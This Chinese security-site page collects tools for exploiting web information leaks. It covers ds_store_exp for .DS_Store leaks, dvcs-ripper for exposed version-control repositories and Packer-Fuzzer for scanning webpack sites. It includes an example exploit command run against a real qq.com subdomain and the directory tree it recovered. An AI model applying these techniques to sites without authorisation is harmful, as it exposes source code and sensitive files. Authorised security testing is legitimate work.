+--------------------+----------+------------------------------------------------+
| 文件名 | 文件类型 | CheckSum |
+--------------------+----------+------------------------------------------------+
| conn.php | file | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 |
| trunk | dir | None |
| branches | dir | None |
| admin_login.php | file | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 |
| phpmyadmin | file | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 |
| README.TXT | file | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 |
| README.txt | file | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 |
| secret.php | file | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 |
| README.md | file | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b |
| img/login_bg01.jpg | file | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd |
| img | dir | None |
| index.php | file | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 |
| test.sql | file | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 |
| admin.php | file | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f |
| document | dir | None |
| tags | dir | None |
+--------------------+----------+------------------------------------------------+
.DS_Store文件泄露利用工具
项目地址
https://github.com/lijiejie/ds_store_exp
项目介绍
ds_store_exp
.DS_Store文件泄露漏洞。
它解析.DS_Store文件并以递归方式下载文件。
这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。
ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store
hd.zj.qq.com/
└── themes
└── galaxyw
├── app
│ └── css
│ └── style.min.css
├── cityData.min.js
├── images
│ └── img
│ ├── bg-hd.png
│ ├── bg-item-activity.png
│ ├── bg-masker-pop.png
│ ├── btn-bm.png
│ ├── btn-login-qq.png
│ ├── btn-login-wx.png
│ ├── ico-add-pic.png
│ ├── ico-address.png
│ ├── ico-bm.png
│ ├── ico-duration-time.png
│ ├── ico-pop-close.png
│ ├── ico-right-top-delete.png
│ ├── page-login-hd.png
│ ├── pic-masker.png
│ └── ticket-selected.png
└── member
├── assets
│ ├── css
│ │ ├── ace-reset.css
│ │ └── antd.css
│ └── lib
│ ├── cityData.min.js
│ └── ueditor
│ ├── index.html
│ ├── lang
│ │ └── zh-cn
│ │ ├── images
│ │ │ ├── copy.png
│ │ │ ├── localimage.png
│ │ │ ├── music.png
│ │ │ └── upload.png
│ │ └── zh-cn.js
│ ├── php
│ │ ├── action_crawler.php
│ │ ├── action_list.php
│ │ ├── action_upload.php
│ │ ├── config.json
│ │ ├── controller.php
│ │ └── Uploader.class.php
│ ├── ueditor.all.js
│ ├── ueditor.all.min.js
│ ├── ueditor.config.js
│ ├── ueditor.parse.js
│ └── ueditor.parse.min.js
└── static
├── css
│ └── page.css
├── img
│ ├── bg-table-title.png
│ ├── bg-tab-say.png
│ ├── ico-black-disabled.png
│ ├── ico-black-enabled.png
│ ├── ico-coorption-person.png
│ ├── ico-miss-person.png
│ ├── ico-mr-person.png
│ ├── ico-white-disabled.png
│ └── ico-white-enabled.png
└── scripts
├── js
└── lib
└── jquery.min.js
21 directories, 48 files
.cvs源代码泄露利用工具
项目地址
https://github.com/kost/dvcs-ripper
项目介绍
dvcs-ripper
翻录 Web 可访问(分布式)版本控制系统:SVN、GIT、Mercurial/hg、bzr、...
即使关闭目录浏览,它也可以翻录存储库。
确保将自己定位在要下载/克隆存储库的空目录中。
Support for brute forcing pack names
Intelligent guessing of packed refs
Support for objects/info/packs from https://www.kernel.org/pub/software/scm/git/docs/gitrepository-layout.html
Recognize 404 pages which return 200
Introduce ignore SSL/TLS verification in SVN/CVS
Bzr support
Webpack安全检测的扫描工具
项目地址
https://github.com/rtcatc/Packer-Fuzzer
项目介绍
Packer Fuzzer
一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具
本工具支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。在扫描结束之后,本工具还支持自动生成扫描报告,您可以选择便于分析的HTML版本以及较为正规的doc、pdf、txt版本。
最后再次申明:
此合集所有工具都来源于互联网公开收集整理,请勿从事非法测试!!!在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。利用此工具集而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与原作者及收集者无关。该仅供安全人员用于授权测试,请勿非法使用!!!除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具集。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
注:工具集有些工具杀软会报毒,请自行判断是否存在后门,收集作者未加入任何后门!!!,建议在本地虚拟机中使用。 欢迎关注站,每日更新最新漏洞情报:
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
暂无评论内容